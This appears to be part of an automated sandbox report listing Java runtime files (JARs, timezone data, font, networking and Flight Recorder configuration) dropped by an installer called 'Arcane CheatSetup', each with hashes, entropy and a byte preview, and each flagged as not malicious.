                                Preview:java/lang/Object..java/lang/String..java/io/Serializable..java/lang/Comparable..java/lang/CharSequence..java/lang/Class..java/lang/reflect/GenericDeclaration..java/lang/reflect/AnnotatedElement..java/lang/reflect/Type..java/lang/Cloneable..java/lang/ClassLoader..java/lang/System..java/lang/Throwable..java/lang/Error..java/lang/ThreadDeath..java/lang/Exception..java/lang/RuntimeException..java/lang/SecurityManager..java/security/ProtectionDomain..java/security/AccessControlContext..java/security/SecureClassLoader..java/lang/ClassNotFoundException..java/lang/ReflectiveOperationException..java/lang/NoClassDefFoundError..java/lang/LinkageError..java/lang/ClassCastException..java/lang/ArrayStoreException..java/lang/VirtualMachineError..java/lang/OutOfMemoryError..java/lang/StackOverflowError..java/lang/IllegalMonitorStateException..java/lang/ref/Reference..java/lang/ref/SoftReference..java/lang/ref/WeakReference..java/lang/ref/FinalReference..java/lang/ref/PhantomReference..sun/misc/Cleaner
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):33932
                                Entropy (8bit):7.930702746433849
                                Encrypted:false
                                SSDEEP:768:xYJfTGikW6VajSe/SA5vN9kqizE48ojVxQYuW+t:xY5TpkK/nFNIzptjVxYHt
                                MD5:C401E00A5DE0DD9723885CEF9E2F5A44
                                SHA1:B6735B93811517F062A20869D8A0B57FAEFF6A90
                                SHA-256:C6574F4763696F2A83028DE143D9ED1C975062BA2D44CC5C91558751FB84BCD6
                                SHA-512:595B950AD5BFF930654BF7FB996BA222D19B4F175821AB0FD6EC4F54D4B7D62B37757429051D1302BC438AB76350B4CD0A07BA712CAECC79DCDB0C60494B5AB2
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H.E..Z...g.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%-..x...R.KRSt.*A.-...M.t....4....sR......K..5y.x..PK...........H................javafx/PK...........H................javafx/embed/PK...........H................javafx/embed/swt/PK...........Hj...........%...javafx/embed/swt/CustomTransfer.class.T[S.F.=.MX(..!............8..`h.d....." yd..........4....%..k.N..ka.83..[.....|+...........#.OD..1...1.1.S1....*>..I..TL.....Y..*.S.q.-KAja..6.M.Y7V|.v...e............+...u...Z.....Z......k...O.v.....x..f...M.v...~I....j.N.(.R.... ..n.%).l:.N..,J...-.%.os:.v.K..V.._p.u.l..e...S5...^.....3+.Yy.h.RtGR..y.)..~...g..R.;5K...{.G.*..X.JP....D....8..[3.g...'d.e#Z.|c.j.t..F.w..t.W.j.,K[q.^..E.=M.a..6d.Z..yV.....=..........:.WG.............RA.<......qT...,*.=.....t\......(aI.2.....!..Jp.,..<.x..n.S....N.K.e.W....N.-..`....hmQ.E.fGE..$..n...4I{.......l_.)......?.Z>...t
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):476286
                                Entropy (8bit):7.905283162751186
                                Encrypted:false
                                SSDEEP:12288:k4VtaECp5plmgYhuWvHuR9Ta/+Aw7okxygk+W:kUChlHYHMaHw7XxW
                                MD5:5D8C1723F3005BD63DBA2B478CE15621
                                SHA1:AB26A6167789DCF81A0C40D121DC91005804C703
                                SHA-256:B637B78CFC33C92D4838D5FABFD0647CE03C3EF69D86EF6A7E6F229510AAF3B5
                                SHA-512:9830CCDFE913A492BB4E0015EE3E729BEA8EC1F22EDF48ED7CE2AEFD5376DF24F33948B9155E31EDFA9BC240544406FD2C43A34DD1366E4936B3318D3CA5ED1C
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/sun/PK...........H................com/sun/javaws/PK...........H................com/sun/javaws/exceptions/PK...........H................com/sun/javaws/jnl/PK...........H................com/sun/javaws/net/PK...........H................com/sun/javaws/net/protocol/PK...........H............ ...com/sun/javaws/net/protocol/jar/PK...........H................com/sun/javaws/progress/PK...........H................com/sun/javaws/security/PK...........H................com/sun/javaws/ui/PK...........H................com/sun/javaws/util/PK...........H................com/sun/jnlp/PK...........H................javax/PK...........H................javax/jnlp/PK...........H~p4=........#...com/sun/javaws/BrowserSupport.class.RMO.1.}...].H @.|.|(...P..B.....
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):155
                                Entropy (8bit):4.618267268558291
                                Encrypted:false
                                SSDEEP:3:nSkoZgZLXnuWxVEsTwVAAiuKIn7IRAdSPGGzJ0vwQAnfMaAHCRyvy:nBcAPWEwVAkIiSPhwwpkaAHCIa
                                MD5:9E5E954BC0E625A69A0A430E80DCF724
                                SHA1:C29C1F37A2148B50A343DB1A4AA9EB0512F80749
                                SHA-256:A46372B05CE9F40F5D5A775C90D7AA60687CD91AAA7374C499F0221229BF344E
                                SHA-512:18A8277A872FB9E070A1980EEE3DDD096ED0BBA755DB9B57409983C1D5A860E9CBD3B67E66FF47852FE12324B84D4984E2F13859F65FABE2FF175725898F1B67
                                Malicious:false
                                Preview:#..# Load the Java Access Bridge class into the JVM..#..#assistive_technologies=com.sun.java.accessibility.AccessBridge..#screen_magnifier_present=true....
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):3091908
                                Entropy (8bit):6.633254981822853
                                Encrypted:false
                                SSDEEP:49152:puZi4j4TQkgaSOHEhjy2twRYEc1sJzlbguMuD:puZiW4smxGocuJlbgq
                                MD5:0B3923ABB0D48FDAE7A2306717967B39
                                SHA1:0882294FFEC2769023AA36FF9CC53562F8E26020
                                SHA-256:E88AEC2A49F07CAC9471D9E4C113FA189600B57245685814D043C20EA8A8B471
                                SHA-512:CF622081B290140CE8419B30FB25442F7204C9A37E1490030A4D656F66C509946F48C50CC7794DA51007EFB202805605FE3C2AC3534D63FBF928EA35CE16A040
                                Malicious:false
                                Preview:PK........s..H................META-INF/....PK........s..H<:S1D...D.......META-INF/MANIFEST.MFManifest-Version: 1.0..Created-By: 1.7.0_07 (Oracle Corporation)....PK...........HUi..............sun/nio/cs/ext/Big5.class.......4."..........t....t............................................................................................................................................................................................................................................................................................................................................................................~.........b2cSBStr...Ljava/lang/String;...ConstantValue...b2cStr...[Ljava/lang/String;...b2c...[[C...b2cSB...[C...b2cInitialized...Z...c2b...c2bIndex...c2bInitialized...<init>...()V...Code...LineNumberTable...historicalName...()Ljava/lang/String;...contains...(Ljava/nio/charset/Charset;)Z...StackMapTable...newDecoder..#()Ljava/nio/charset/CharsetDecoder;...newEncoder..#()Ljava/nio/charset/Ch
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):3490933
                                Entropy (8bit):6.067002853185717
                                Encrypted:false
                                SSDEEP:49152:WX4zfeUcKDQ1toKXiO3fLxqhH3YRazQwIK7XgnyRMvMtMm55HopLKbtJzUkMkOBV:GL
                                MD5:9A084B91667E7437574236CD27B7C688
                                SHA1:D8926CC4AA12D6FE9ABE64C8C3CB8BC0F594C5B1
                                SHA-256:A1366A75454FC0F1CA5A14EA03B4927BB8584D6D5B402DFA453122AE16DBF22D
                                SHA-512:D603AA29E1F6EEFFF4B15C7EBC8A0FA18E090D2E1147D56FD80581C7404EE1CB9D6972FCF2BD0CB24926B3AF4DFC5BE9BCE1FE018681F22A38ADAA278BF22D73
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........H....$...$.......META-INF/mailcap.default#.# This is a very simple 'mailcap' file.#.image/gif;;..x-java-view=com.sun.activation.viewers.ImageViewer.image/jpeg;;..x-java-view=com.sun.activation.viewers.ImageViewer.text/*;;..x-java-view=com.sun.activation.viewers.TextViewer.text/*;;..x-java-edit=com.sun.activation.viewers.TextEditor.PK...........H..{~2...2.......META-INF/mimetypes.default#.# A simple, old format, mime.types file.#.text/html..html htm HTML HTM.text/plain..txt text TXT TEXT.image/gif..gif GIF.image/ief..ief.image/jpeg..jpeg jpg jpe JPG.image/tiff..tiff tif.
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:data
                                Category:dropped
                                Size (bytes):103910
                                Entropy (8bit):7.113278604363908
                                Encrypted:false
                                SSDEEP:1536:OcQWmFKJzLl2g6kpE7tdTMBB/////t97Taz69rU4y/uqmol7s2gK:Oyh3F27/qGzkrfy/uqllQ2gK
                                MD5:5A7F416BD764E4A0C2DEB976B1D04B7B
                                SHA1:E12754541A58D7687DEDA517CDDA14B897FF4400
                                SHA-256:A636AFA5EDBA8AA0944836793537D9C5B5CA0091CCC3741FC0823EDAE8697C9D
                                SHA-512:3AB2AD86832B98F8E5E1CE1C1B3FFEFA3C3D00B592EB1858E4A10FFF88D1A74DA81AD24C7EC82615C398192F976A1C15358FCE9451AA0AF9E65FB566731D6D8F
                                Malicious:false
                                Preview:...TZDB....2016d.S..Africa/Abidjan..Africa/Accra..Africa/Addis_Ababa..Africa/Algiers..Africa/Asmara..Africa/Asmera..Africa/Bamako..Africa/Bangui..Africa/Banjul..Africa/Bissau..Africa/Blantyre..Africa/Brazzaville..Africa/Bujumbura..Africa/Cairo..Africa/Casablanca..Africa/Ceuta..Africa/Conakry..Africa/Dakar..Africa/Dar_es_Salaam..Africa/Djibouti..Africa/Douala..Africa/El_Aaiun..Africa/Freetown..Africa/Gaborone..Africa/Harare..Africa/Johannesburg..Africa/Juba..Africa/Kampala..Africa/Khartoum..Africa/Kigali..Africa/Kinshasa..Africa/Lagos..Africa/Libreville..Africa/Lome..Africa/Luanda..Africa/Lubumbashi..Africa/Lusaka..Africa/Malabo..Africa/Maputo..Africa/Maseru..Africa/Mbabane..Africa/Mogadishu..Africa/Monrovia..Africa/Nairobi..Africa/Ndjamena..Africa/Niamey..Africa/Nouakchott..Africa/Ouagadougou..Africa/Porto-Novo..Africa/Sao_Tome..Africa/Timbuktu..Africa/Tripoli..Africa/Tunis..Africa/Windhoek..America/Adak..America/Anchorage..America/Anguilla..America/Antigua..America/Araguaina..America/
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:data
                                Category:dropped
                                Size (bytes):4122
                                Entropy (8bit):3.2585384283455134
                                Encrypted:false
                                SSDEEP:48:BlWxFFGFSupi94blATFxjGph5vLC6/w37ZXQTbVm/eVzOBJ:BlWJEi94blAT+ph5vLkApmGqr
                                MD5:F6258230B51220609A60AA6BA70D68F3
                                SHA1:B5B95DD1DDCD3A433DB14976E3B7F92664043536
                                SHA-256:22458853DA2415F7775652A7F57BB6665F83A9AE9FB8BD3CF05E29AAC24C8441
                                SHA-512:B2DFCFDEBF9596F2BB05F021A24335F1EB2A094DCA02B2D7DD1B7C871D5EECDA7D50DA7943B9F85EDB5E92D9BE6B6ADFD24673CE816DF3960E4D68C7F894563F
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):3144
                                Entropy (8bit):4.858724831876285
                                Encrypted:false
                                SSDEEP:48:VBnTRxiW1nTbXMROXX6zcjd6vEzcoZDTzcj8L0zccfbb6wB:VBnvisPMQ6z+zPVzv0zVfvT
                                MD5:1CBB261944925044B1EE119DC0563D05
                                SHA1:05F2F63047F4D82F37DFA59153309E53CAA4675C
                                SHA-256:5BAF75BDD504B2C80FF5B98F929A16B04E9CB06AA8AAE30C144B5B40FEBE0906
                                SHA-512:C964A92BE25BACF11D20B61365930CAB28517D164D9AE4997651E2B715AA65628E45FA4BD236CCD507C65E5D85A470FD165F207F446186D22AE4BD46A04006E6
                                Malicious:false
                                Preview:############################################################..# .Default Networking Configuration File..#..# This file may contain default values for the networking system properties...# These values are only used when the system properties are not specified..# on the command line or set programatically...# For now, only the various proxy settings can be configured here...############################################################....# Whether or not the DefaultProxySelector will default to System Proxy..# settings when they do exist...# Set it to 'true' to enable this feature and check for platform..# specific proxy settings..# Note that the system properties that do explicitely set proxies..# (like http.proxyHost) do take precedence over the system settings..# even if java.net.useSystemProxies is set to true... ..java.net.useSystemProxies=false....#------------------------------------------------------------------------..# Proxy configuration for the various protocol handlers...# D
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2915
                                Entropy (8bit):5.2172692442941075
                                Encrypted:false
                                SSDEEP:48:GgQv18IsTJvuUdEt6u7KeblbhGwQEvzZIE+i+WEi+Iq4fNSg2kv:Gb6Xha1hFGwQEvdh+5g2kv
                                MD5:A38587427E422D55B012FA3E5C9436D2
                                SHA1:7BD1B81B39DA78124BE045507E0681E860921DBB
                                SHA-256:D2C47DE948033ED836B375CCD518CF55333FE11C4CED56BC1CE2FF62114CF546
                                SHA-512:EA6CA975E9308ED2B3BBCCE91EE61142DAB0067CE8F17CB469929F6136E6B4A968BAC838141D8B38866F9EF5E15E156400859CCCC84FB114214E19556F0DC636
                                Malicious:false
                                Preview:#..#..# Copyright (c) 1996, 2000, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..#.Japanese PostScript printer property file..#..font.num=16..#..serif=serif..timesroman=serif..sansserif=sansserif..helvetica=sansserif..monospaced=monospaced..courier=monospaced..dialog=sansserif..dialoginput=monospaced..#..serif.latin1.plain=Times-Roman..serif.latin1.italic=Times-Italic..serif.latin1.bolditalic=Times-BoldItalic..serif.latin1.bold=Times-Bold..#..sansserif.latin1.plain=Helvetica..sansserif.latin1.italic=Helvetica-Oblique..sansserif.latin1.bolditalic=Helvetica-BoldOblique..sansserif.latin1.bold=Helvetica-Bold..#..monospaced.latin1.plain=Courier..monospaced.latin1.italic=Courier-Oblique..monospaced.latin1.bolditalic=Courier-BoldOblique..monospaced.latin1.bold=Courier-Bold..#..serif.x11jis0208.plain=Ryumin-Light-H..serif.x11jis0208.italic=Ryumin-Light-H
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:raw G3 (Group 3) FAX
                                Category:dropped
                                Size (bytes):3670
                                Entropy (8bit):4.40570512634857
                                Encrypted:false
                                SSDEEP:96:IRsY7hGbXWvaBKvKY5csW4BxciETBT5Bxrws+LW/B56JF:At/vaBKvKY5fxci8jMWY
                                MD5:E0E5428560288E685DBFFC0D2776D4A6
                                SHA1:2AE70624762C163C8A1533F724AA5A511D8B208E
                                SHA-256:AAE23ACC42F217A63D675F930D077939765B97E9C528B5659842515CA975111F
                                SHA-512:C726CC2898399579AFA70ACACE86BEC4369D4541112243E51721568B4D25DCC6C66FA64AC475AFF9BA9DE07A630B24A9F221FA00426AD36845203BA809219E3C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):14331
                                Entropy (8bit):3.512673497574481
                                Encrypted:false
                                SSDEEP:96:W6Zh/3dzz8XIrN2r1CdaqRWtHwBWgvw0Jy/ArUsJzu0HI:W6jhGIwxCdaqWQBWgvw0JyorBJzu0o
                                MD5:6E378235FB49F30C9580686BA8A787AA
                                SHA1:2FC76D9D615A35244133FC01AB7381BA49B0B149
                                SHA-256:B4A0C0A98624C48A801D8EA071EC4A3D582826AC9637478814591BC6EA259D4A
                                SHA-512:58558A1F8D9D3D6F0E21B1269313FD6AC9A80A93CC093A5E8CDEC495855FCD2FC95A6B54FE59E714E89D9274654BB9C1CD887B3FB9D4B9D9C50E5C5983C571B8
                                Malicious:false
                                Preview:# Copyright (c) 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..# This properties file defines a Hijrah calendar variant...#..# Fields:..#..# <version> ::= 'version' '=' <version string>..# <id> ::= 'id' '=' <id string>..# <type> ::= 'type' '=' <type string>..# <iso-start> ::= 'iso-start' '=' <start date in the ISO calendar>..# <year> ::= <yyyy> '=' <nn nn nn nn nn nn nn nn nn nn nn nn>..#..# version ... (Required)..#..# id ... (Required)..# Identifies the Java Chronology..#..# type ... (Required)..# Identifies the type of calendar in the standard calendar ID scheme..# iso-start ... (Required)..# Specifies the corresponding ISO date to the first Hijrah day..# in the defined range of dates..#..# year ... (Required)..# Number of days for each month of a Hijrah year..# * Each line defines a ye
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):381
                                Entropy (8bit):4.99308306420453
                                Encrypted:false
                                SSDEEP:6:5ji0B4r/Rjiszbdy/oocj+sqX2K5YZ5/CUMQxxi6m4xijgxmzbdGh/4:5ji0GJjiIq1cCvXPA/CUMQxoeocx2K/4
                                MD5:B608D45DCDD7A4CAD6A63A89A002F683
                                SHA1:F6E3BB7050C3B1A3BED9B33122C4A98E6B9A810D
                                SHA-256:52CA96531445B437DCA524CB3714FCD8D70221D37A6B9C80F816713C3040DD0A
                                SHA-512:407E7CA807826F0E41B085BCA0F54F0134E3B9AC16FA5480EDE02774067DAD46AA07D225BA2981DEC2A7297EA57721EAB8C54E8BED83D352EC6C00ABFDBBF626
                                Malicious:false
                                Preview:PK........t..H................META-INF/......PK..............PK........t..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r9....:.$..[).....&.%....E..r.\.E....y...r..PK.....k.......PK..........t..H..............................META-INF/....PK..........t..H...k.....................=...META-INF/MANIFEST.MFPK..........}.........
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4005
                                Entropy (8bit):4.909684349537555
                                Encrypted:false
                                SSDEEP:96:5Th0S7zmtRUioj/DUXBZZjM8mcWoe+YfVktH:5h0Iz6Uioj/YXLZjnmdoeDktH
                                MD5:B0CE9F297D3FEC6325C0C784072908F1
                                SHA1:DD778A0E5417B9B97187215FFC66D4C14F95FEF0
                                SHA-256:6DA00C1CBE02909DCD6A75DA51D25DBF49BFD1D779C0B8E57B12E757229FC4A8
                                SHA-512:4C774BCB9ADE996569C86DD46B3BDB046771AD1BCF9AABB9DB86854C83E18015CBE5DF73DA86EE98E26BA0393F548B1CC09DE60BDA4248EACC4FC833E23B8AB4
                                Malicious:false
                                Preview:#..# This properties file is used to initialize the default..# java.awt.datatransfer.SystemFlavorMap. It contains the Win32 platform-..# specific, default mappings between common Win32 Clipboard atoms and platform-..# independent MIME type strings, which will be converted into..# java.awt.datatransfer.DataFlavors...#..# These default mappings may be augmented by specifying the..#..# AWT.DnD.flavorMapFileURL ..#..# property in the appropriate awt.properties file. The specified properties URL..# will be loaded into the SystemFlavorMap...#..# The standard format is:..#..# <native>=<MIME type>..#..# <native> should be a string identifier that the native platform will..# recognize as a valid data format. <MIME type> should specify both a MIME..# primary type and a MIME subtype separated by a '/'. The MIME type may include..# parameters, where each parameter is a key/value pair separated by '=', and..# where each parameter to the MIME type is separated by a ';'...#..# Because SystemFla
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):10779
                                Entropy (8bit):5.217016051711063
                                Encrypted:false
                                SSDEEP:192:Pj2TlKg7RzPc/mOHUFN5HX/rS8QbWZjjfVpMbtxp8lcR9NN:Pj6Y8NcFzXbWZjj9pSMlcz
                                MD5:0C1DB7410938A3634BD9928BA2F284CB
                                SHA1:7EE31F22136E73A2A3D0AAB279199778BAAB06F5
                                SHA-256:818A718788E5506EBB84F26DE82B6C60E08861876400E9ED3931346174D5D7FB
                                SHA-512:EE267E59564A077713856A307382D40D0D8DF8E7EC2EF930723B076F5E38446D3B2600D10AC192262F9A3A86D9973CF13A9E90D180818C05A6C7896A5BD7AD19
                                Malicious:false
                                Preview:#..# ..# Copyright (c) 2003, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....# Version....version=1....# Component Font Mappings....allfonts.chinese-ms936=SimSun..allfonts.chinese-ms936-extb=SimSun-ExtB..allfonts.chinese-gb18030=SimSun-18030..allfonts.chinese-gb18030-extb=SimSun-ExtB..allfonts.chinese-hkscs=MingLiU_HKSCS..allfonts.chinese-ms950-extb=MingLiU-ExtB..allfonts.devanagari=Mangal..allfonts.dingbats=Wingdings..allfonts.lucida=Lucida Sans Regular..allfonts.symbol=Symbol..allfonts.thai=Lucida Sans Regular..allfonts.georgian=Sylfaen....serif.plain.alphabetic=Times New Roman..serif.plain.chinese-ms950=MingLiU..serif.plain.chinese-ms950-extb=MingLiU-ExtB..serif.plain.hebrew=David..serif.plain.japanese=MS Mincho..serif.plain.korean=Batang....serif.bold.alphabetic=Times New Roman Bold..serif.bold.chinese-ms950=PMingLiU..serif.bold.chinese-ms9
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):58
                                Entropy (8bit):4.4779965120705425
                                Encrypted:false
                                SSDEEP:3:CEBqRM9LTAGQdLV6ETEBqRM9LHQIuHPy:CEAsnAbLlszQdy
                                MD5:3C2B9CCAAD3D986E5874E8C0F82C37CF
                                SHA1:D1DDA4A2D5D37249C8878437DBF36C6AE61C33D1
                                SHA-256:D5BCD7D43E383D33B904CFF6C80ACE359DBE2CE2796E51E9743358BD650E4198
                                SHA-512:4350CCA847D214479C6AE430EB71EE98A220EA10EC175D0AB317A8B43ABC9B4054E41D0FF383F26D593DE825F761FB93704E37292831900F31E5E38167A41BAB
                                Malicious:false
                                Preview:javafx.runtime.version=8.0.101..javafx.runtime.build=b13..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):476286
                                Entropy (8bit):7.905283162751186
                                Encrypted:false
                                SSDEEP:12288:k4VtaECp5plmgYhuWvHuR9Ta/+Aw7okxygk+W:kUChlHYHMaHw7XxW
                                MD5:5D8C1723F3005BD63DBA2B478CE15621
                                SHA1:AB26A6167789DCF81A0C40D121DC91005804C703
                                SHA-256:B637B78CFC33C92D4838D5FABFD0647CE03C3EF69D86EF6A7E6F229510AAF3B5
                                SHA-512:9830CCDFE913A492BB4E0015EE3E729BEA8EC1F22EDF48ED7CE2AEFD5376DF24F33948B9155E31EDFA9BC240544406FD2C43A34DD1366E4936B3318D3CA5ED1C
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/sun/PK...........H................com/sun/javaws/PK...........H................com/sun/javaws/exceptions/PK...........H................com/sun/javaws/jnl/PK...........H................com/sun/javaws/net/PK...........H................com/sun/javaws/net/protocol/PK...........H............ ...com/sun/javaws/net/protocol/jar/PK...........H................com/sun/javaws/progress/PK...........H................com/sun/javaws/security/PK...........H................com/sun/javaws/ui/PK...........H................com/sun/javaws/util/PK...........H................com/sun/jnlp/PK...........H................javax/PK...........H................javax/jnlp/PK...........H~p4=........#...com/sun/javaws/BrowserSupport.class.RMO.1.}...].H @.|.|(...P..B.....
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):114950
                                Entropy (8bit):7.912507028584016
                                Encrypted:false
                                SSDEEP:1536:5sNJO+ylt6se6sgU0w/XzGYWuSy15DudYLSfaxwpt5g1naZEqwoJ8sYcF+z/VSG8:aj8GHXZSy1pudYLdQe1ATtKVS+ws9O
                                MD5:A39F61D6ED2585519D7AF1E2EA029F59
                                SHA1:52515AC6DEAB634F3495FD724DEA643EE442B8FD
                                SHA-256:60724D9E372FBE42759349A06D3426380CA2B9162FA01EB2C3587A58A34AD7E0
                                SHA-512:AC2E9AB749F5365BE0FB8EBD321E8F231D22EAE396053745F047FCBCCF8D3DE2F737D3C37A52C715ADDFBDBD18F14809E8B37B382B018B58A76E063EFBA96948
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):560553
                                Entropy (8bit):5.781566946934384
                                Encrypted:false
                                SSDEEP:12288:G5l+qU67FYWg+YWgYWeoXqgYSq8eh2f/m5NwaHkSIJHvWQ6Q7ooMcgH5lY7TQ5cD:G5l+qU67FYWg+YWgYWeoXqgYSq8eh2f3
                                MD5:CCB395235C35C3ACBA592B21138CC6AB
                                SHA1:29C463AA4780F13E77FB08CC151F68CA2B2958D5
                                SHA-256:27AD8EA5192EE2D91BA7A0EACE9843CB19F5E145259466158C2F48C971EB7B8F
                                SHA-512:D4C330741387F62DD6E52B41167CB11ABD8615675FE7E1C14AE05A52F87A348CBC64B56866AE313B2906B33CE98BE73681F769A4A54F6FE9A7D056F88CF9A4E1
                                Malicious:false
                                Preview:PK........t..H................META-INF/....PK........t..H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........HB.<>^...^...8...com/oracle/jrockit/jfr/client/EventSettingsBuilder.class.......4....5.f..g....f..4.h..4.i..j....f..4.k..l....m..4.n..o....f..4.p..q..r....f....s....t....u....v..w..x..y....z..{....|....}....~.................................#.........................)...................................................eventDefaultSets...Ljava/util/ArrayList;...Signature..DLjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventDefaultSet;>;...settings..ALjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventSetting;>;...eventDescriptorType..2Loracle/jrockit/jfr/openmbean/
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):20670
                                Entropy (8bit):4.627043889535612
                                Encrypted:false
                                SSDEEP:192:VOMjUVCEM0Ut0ZINFWbqsZSwOVzx8xyxxxbAJ1muS7khPdyPsXZd2ZhptEgReW82:VONVTVgF9SsTMLA
                                MD5:47495DA4E7B3AF33F5C3ED1E35AC25AE
                                SHA1:F6DE88A4C6AE0C14B9F875FB4BC4721A104CB0EE
                                SHA-256:37D19EAC73DEEB613FBB539AE7E7C99339939EB3EFEC44E9EB45F68426E9F159
                                SHA-512:74DBEB118575B8881D5B43270EF878162DBDC222AC6D20F04699B2B733427347ABC76D6E82BF7728FCC435129B114E4C75D011FC5DDDEAF5A59E137BBC81F2B9
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8"?>.... .. Recommended way to edit .jfc files is to use Java Mission Control,.. see Window -> Flight Recorder Template Manager...-->....<configuration version="1.0" name="Continuous" description="Low overhead configuration safe for continuous use in production environments, typically less than 1 % overhead." provider="Oracle">.... <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.... <control>.... .. Contents of the control element is not read by the JVM, it's used.. by Java Mission Control to change settings that carry the control attribute... -->.... <selection name="gc-level" default="detailed" label="Garbage Collector">.. <option label="Off" name="off">off</option>.. <option label="Normal" name="detailed">normal</option>.. <option label="All" name="all">all</option>.. </selection>.... <condition name="gc-enabled-normal" true="true" false="fals
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):20626
                                Entropy (8bit):4.626761353117893
                                Encrypted:false
                                SSDEEP:192:VeMjUECOwMsUt0ZINFWbqeZSwOVza8ayaxabAJ1duSikhPdyPsXZd2ZhptEgReWL:VeNEg/gF/ZnixLy
                                MD5:5480BEF2CA99090857E5CBF225C12A78
                                SHA1:E1F73CA807EC14941656FBE3DB6E5E5D9032041D
                                SHA-256:5FB0982C99D6BF258335FB43AAAE91919804C573DFD87B51E05C54ADB3C0392B
                                SHA-512:65FE0D6DA17E62CF29875910EB84D57BC5BB667C753369B4F810028C0995E63C322FAD2EB99658B6C19E11E8D2A40CB11B3C09943EB9C0B88F45626579ECE058
                                Malicious:false
